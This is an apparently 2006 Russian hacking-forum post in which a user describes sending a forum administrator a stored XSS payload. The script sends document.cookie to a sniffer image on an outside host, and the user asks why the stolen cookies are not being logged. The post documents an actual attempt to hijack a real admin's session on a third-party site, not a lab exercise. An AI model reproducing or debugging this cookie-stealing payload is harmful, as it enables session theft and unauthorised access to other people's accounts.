ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Вопрос по организации XSS атаки, на уязвимом форуме..
  #1  
Старый 09.07.2006, 10:09
Аватар для a1nt
a1nt
Участник форума
Регистрация: 16.12.2005
Сообщений: 146
Провел на форуме:
573934

Репутация: 114
По умолчанию Вопрос по организации XSS атаки, на уязвимом форуме..

Нашел уязвимый форум, где можно вставить
Код:
<script></script>
. Чтобы забрать cookies админа отправил ему сообщение
Код:
<script>img = new Image(); img src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>
Где картинк - сниффер на antichat.org. Но когда я написал этот код в html и открыл браузером - моя загрузка в лог добавлена не была, только когда напрямую обращаюсь к http://antichat.org/s/a1nt.gif, мой IP добавляется. В чем же все-таки проблема и стоит ли мне ждать админских cookies?
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Proxy FAQ foreva Чужие Статьи 12 04.01.2008 12:15
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Вопрос по применению XSS на форуме ExBB 1.9.1 TweakeR Форумы 9 28.02.2006 18:24
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48
Вопрос про проведению атаки класса XSS, в форуме Invison Power Board badboy Форумы 10 02.06.2005 22:28



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ